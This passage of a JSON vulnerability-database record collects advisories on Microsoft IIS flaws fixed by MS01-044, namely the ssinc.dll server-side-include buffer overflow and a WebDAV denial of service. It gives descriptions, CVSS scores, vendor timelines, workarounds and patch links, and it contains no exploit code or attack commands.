receiving\r\n the request.\r\n\r\n\r\n\r\nWorkaround:\r\n===================\r\n\r\n 1. Disable the write access to Web directory of untrusted user.\r\n 2. Remove .shtml, .shtm and .stm mappings if SSI service is not needed.\r\n\r\nVendor Status:\r\n==============\r\n\r\n2001.6.11 We informed Microsoft of this vulnerability.\r\n2001.6.11 Microsoft replied that the bug has been reproduced.\r\n2001.8.15 Microsoft has released one security bulletin(MS01-044) concerning \r\n this flaw.\r\n\r\nThe bulletin is live at :\r\n\r\nhttp://www.microsoft.com/technet/security/bulletin/MS01-044.asp\r\n\r\nPatches are available at:\r\n \r\n. Microsoft IIS 4.0:\r\n http://www.microsoft.com/Downloads/Release.asp?ReleaseID=32061\r\n\r\n. Microsoft IIS 5.0:\r\n http://www.microsoft.com/Downloads/Release.asp?ReleaseID=32011 \r\n\r\nAdditional Information:\r\n========================\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has \r\nassigned the name CAN-2001-0506 to this issue. This is a \r\ncandidate for inclusion in the CVE list (http://cve.mitre.org),\r\nwhich standardizes names for security problems. Candidates \r\nmay change significantly before they become official CVE entries.\r\n\r\nDISCLAIMS:\r\n==========\r\nTHE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY\r\nOF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, \r\nEXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENTSHALL NSFOCUS \r\nBE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, \r\nINCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, \r\nEVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. \r\nDISTRIBUTION OR REPRODUTION OF THE INFORMATION IS PROVIDED THAT THE \r\nADVISORY IS NOT MODIFIED IN ANY WAY.\r\n\r\nCopyright 1999-2001 NSFOCUS. All Rights Reserved. Terms of use.\r\n\r\n\r\nNSFOCUS Security Team <security@nsfocus.com>\r\nNSFOCUS INFORMATION TECHNOLOGY CO.,LTD\r\n(http://www.nsfocus.com)\r\n \r\n\r\n\r\n", "modified": "2001-08-17T00:00:00", "published": "2001-08-17T00:00:00", "id": "SECURITYVULNS:DOC:1940", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:1940", "title": "NSFOCUS SA2001-06 : Microsoft IIS ssinc.dll Buffer Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T21:35:12", "bulletinFamily": "exploit", "description": "CVE CAN ID : CAN-2001-0508\r\n\r\nMicrosoft IIS 5.0 WebDAV\u5904\u7406\u4e2d\u5b58\u5728\u4e00\u4e2a\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u4e34\u65f6\u4e2d\u65adIIS\r\n5.0\u670d\u52a1\u3002 WebDAV\u6ca1\u6709\u6b63\u786e\u7684\u5904\u7406\u7279\u5b9a\u7c7b\u578b\u7684\u8bf7\u6c42\uff0c\u7279\u522b\u662f\u8bf7\u6c42\u76f8\u5f53\u957f\u800c\u4e14\u5176\u4e2d\u5305\u542b\u67d0\u79cd\r\n\u7c7b\u578b\u7684\u65e0\u6548\u6570\u636e\u65f6\u3002\u8fd9\u4f1a\u5bfc\u81f4\u5185\u5b58\u8bbf\u95ee\u9519\u8bef\uff0c\u4ece\u800c\u4f7f\u5f97IIS 5.0\u8fdb\u7a0b\u4e2d\u65ad\u3002\u7531\u4e8e\u7f3a\u7701\u60c5\u51b5\r\n\u4e0b\uff0cIIS 5.0\u4f1a\u81ea\u52a8\u91cd\u542f\u3002\u56e0\u6b64\u8fd9\u53ea\u4f1a\u4e34\u65f6\u4e2d\u65adIIS\u670d\u52a1\u3002\r\n\n\nMicrosoft IIS 5.0 \r\n - Microsoft Windows 2000\n \u5382\u5546\u8865\u4e01\uff1a\r\n\r\n\u5fae\u8f6f\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS01-044\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01\u7a0b\u5e8f\uff1a\r\n<a href=http://www.microsoft.com/technet/security/bulletin/MS01-044.asp target=_blank>http://www.microsoft.com/technet/security/bulletin/MS01-044.asp</a>\r\n\r\n\u8865\u4e01\u4e0b\u8f7d\uff1a\r\n \r\n Microsoft IIS 5.0:\r\n <a href=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=32011 target=_blank>http://www.microsoft.com/Downloads/Release.asp?ReleaseID=32011</a>", "modified": "2008-07-16T00:00:00", "published": "2008-07-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-3636", "id": "SSV:3636", "title": "Microsoft IIS 5.0 WebDAV\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e(MS01-044)", "type": "seebug", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": ""}], "cert": [{"lastseen": "2019-10-09T19:53:59", "bulletinFamily": "info", "description": "### Overview \n\nIntruders can disrupt the normal operation of an IIS 5.0 server using a malicious Web Distributed Authoring and Versioning (WebDAV) request. \n\n### Description \n\n[WebDAV](<http://www.ietf.org/rfc/rfc2518.txt>) is an extension to HTTP used to manage content on web servers. Quoting from [RFC 2518](<http://www.ietf.org/rfc/rfc2518.txt>): \n\n_[WebDAV is] an extension to the HTTP/1.1 protocol that allows clients to perform remote web content authoring operations. This extension provides a coherent set of methods, headers, request entity body formats, and response entity body formats that provide operations for: _` `_Properties [...], Collections [... and], Namespace Operations._ \n \nA vulnerability in the Microsoft implementation of WebDAV can be used to disrupt IIS 5.0. Quoting from [MS01-044](<http://www.microsoft.com/technet/security/bulletin/MS01-044.asp>), \n \n_A denial of service vulnerability [exists] that could enable an attacker to temporarily disrupt service on an IIS 5.0 web server. WebDAV doesn't correctly handle [a] particular type of very long, invalid request. Such a request would cause the IIS 5.0 service to fail; by default, it would automatically restart._ \n \nWebDAV is installed and operational by default on Microsoft IIS 5.0. This does not affect IIS 4.0 servers. \n \n--- \n \n### Impact \n\nAn intruder can cause the IIS 5.0 service to fail. It will restart by default. \n \n--- \n \n### Solution \n\nApply a patch as described in [MS01-044](<http://www.microsoft.com/technet/security/bulletin/MS01-044.asp>). This is a cumulative patch that addresses a number of security problems discovered prior to August 15, 2001. \n \n--- \n \n### Vendor Information\n\n959211\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ __ Microsoft\n\nUpdated: September 18, 2001 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nSee <http://www.microsoft.com/technet/security/bulletin/MS01-044.asp>\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23959211 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms01-044.asp>\n * <http://www.securityfocus.com/bid/3194>\n * <http://www.ietf.org/rfc/rfc2518.txt>\n\n### Acknowledgements\n\nThis document was written by Shawn Hernan, based upon information in Microsoft Security Bulletin MS01-044.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2001-0508](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0508>) \n---|--- \n**Severity Metric:****** | 12.60 \n**Date Public:** | 2001-08-15 \n**Date First Published:** | 2001-09-18 \n**Date Last Updated: ** | 2001-09-18 21:07 UTC \n**Document Revision: ** | 11 \n", "modified": "2001-09-18T21:07:00", "published": "2001-09-18T00:00:00", "id": "VU:959211", "href": "https://www.kb.cert.org/vuls/id/959211", "type": "cert", "title": "Microsoft IIS vulnerable to DoS via invalid request for very long WebDAV requests", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-10-09T19:53:33", "bulletinFamily": "info", "description": "### Overview \n\nA buffer overflow in the code that processes server-side include files on IIS 4.0 and IIS 5.0 could allow an intruder to execute code with the privileges of the web server. \n\n### Description \n\nA buffer overflow exists in the code that processes server side include directives on IIS versions 4 and 5. An intruder who can create or modify files on the web server can subsequently use this buffer overflow to execute arbitrary code with the privileges of the web server. Quoting from Microsoft Security Bulletin [MS01-044](<http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-044.asp>): \n\n_A buffer overrun vulnerability involving the code that performs server-side include (SSI) directives. An attacker who had the ability to place content onto a server could include a malformed SSI directive that, when the content was processed, would result in code of the attacker\u2019s choice running in Local System context._ \n \nUnder ordinary circumstances, only web administrators would be able to create or modify the necessary files. \n \n--- \n \n### Impact \n\nAn intruder can execute arbitrary code with the privileges of the web server. \n \n--- \n \n### Solution \n\nApply a patch as described in <http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-044.asp>. Alternately, Microsoft has indicated this issue will be addressed in Windows 2000 service pack 3. \n \n--- \n \n### Vendor Information\n\n630531\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ __ Microsoft Corporation\n\nUpdated: July 13, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nSee <http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-044.asp>. \n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23630531 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www.microsoft.com/technet/security/bulletin/MS01-044.asp>\n * <http://support.microsoft.com/default.aspx?scid=kb;en-us;Q301625>\n * <http://www.securityfocus.com/bid/3190>\n\n### Acknowledgements\n\nThanks to the NSFocus Team for reporting this vulnerability and to Microsoft for the information contained in their bulletin. \n\nThis document was written by Shawn V Hernan.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2001-0506](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0506>) \n---|--- \n**Severity Metric:****** | 12.66 \n**Date Public:** | 2001-08-15 \n**Date First Published:** | 2002-07-13 \n**Date Last Updated: ** | 2002-07-13 21:36 UTC \n**Document Revision: ** | 12 \n", "modified": "2002-07-13T21:36:00", "published": "2002-07-13T00:00:00", "id": "VU:630531", "href": "https://www.kb.cert.org/vuls/id/630531", "type": "cert", "title": "Microsoft Internet Information Server (IIS) vulnerable to buffer overflow via malformed server-side include directive", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}